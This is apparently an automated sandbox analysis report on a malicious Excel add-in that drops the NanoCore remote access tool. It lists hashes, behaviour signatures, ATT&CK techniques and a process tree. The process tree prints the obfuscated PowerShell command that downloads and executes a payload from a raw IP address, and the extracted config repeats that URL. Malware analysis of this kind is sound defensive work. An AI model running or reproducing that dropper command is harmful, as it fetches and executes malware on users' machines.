Analysis

  • max time kernel
    149s
  • max time network
    144s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    20-04-2021 20:10

General

  • Target

    Swift_Processing and monitoring.xlam

  • Size

    19KB

  • MD5

    e776a82944a04d1939e9ce9916c30771

  • SHA1

    080948c7533b52301fdaa5d3be8b04d58d24aa12

  • SHA256

    aac964b49d6f12b420121a28b5c856e473695e00cb5095b862ea9c0db67ed119

  • SHA512

    7c9eebbc93f362ec5173ca1a06c38a920c1cff240974bab882c451fbd08d9c6799dd7c0004f8463f6b4b133bb1beedcd1227fa91feead363272f555cc9852891

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://179.43.140.150/shtq/fack.jpg

Signatures

  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Swift_Processing and monitoring.xlam"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4000
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('http://179.43.140.150/shtq/fack.jpg')"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3008
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        PID:2648
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 4000 -s 4048
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of NtCreateProcessExOtherParentProcess
      • Program crash
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3760

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2648-187-0x0000000005170000-0x000000000566E000-memory.dmp
    Filesize

    5.0MB

  • memory/2648-186-0x0000000005170000-0x000000000566E000-memory.dmp
    Filesize

    5.0MB

  • memory/2648-184-0x000000000041E792-mapping.dmp
  • memory/3008-180-0x0000000000000000-mapping.dmp
  • memory/3008-185-0x000001F3BF6B0000-0x000001F3BF6B1000-memory.dmp
    Filesize

    4KB

  • memory/3008-183-0x000001F3BD806000-0x000001F3BD808000-memory.dmp
    Filesize

    8KB

  • memory/3008-181-0x000001F3BD800000-0x000001F3BD802000-memory.dmp
    Filesize

    8KB

  • memory/3008-182-0x000001F3BD803000-0x000001F3BD805000-memory.dmp
    Filesize

    8KB

  • memory/4000-118-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp
    Filesize

    64KB

  • memory/4000-179-0x0000029C5E480000-0x0000029C5E484000-memory.dmp
    Filesize

    16KB

  • memory/4000-123-0x0000029C4AAD0000-0x0000029C4C9C5000-memory.dmp
    Filesize

    31.0MB

  • memory/4000-122-0x00007FFAA9DE0000-0x00007FFAAAECE000-memory.dmp
    Filesize

    16.9MB

  • memory/4000-119-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp
    Filesize

    64KB

  • memory/4000-114-0x00007FF678D60000-0x00007FF67C316000-memory.dmp
    Filesize

    53.7MB

  • memory/4000-117-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp
    Filesize

    64KB

  • memory/4000-116-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp
    Filesize

    64KB

  • memory/4000-115-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp
    Filesize

    64KB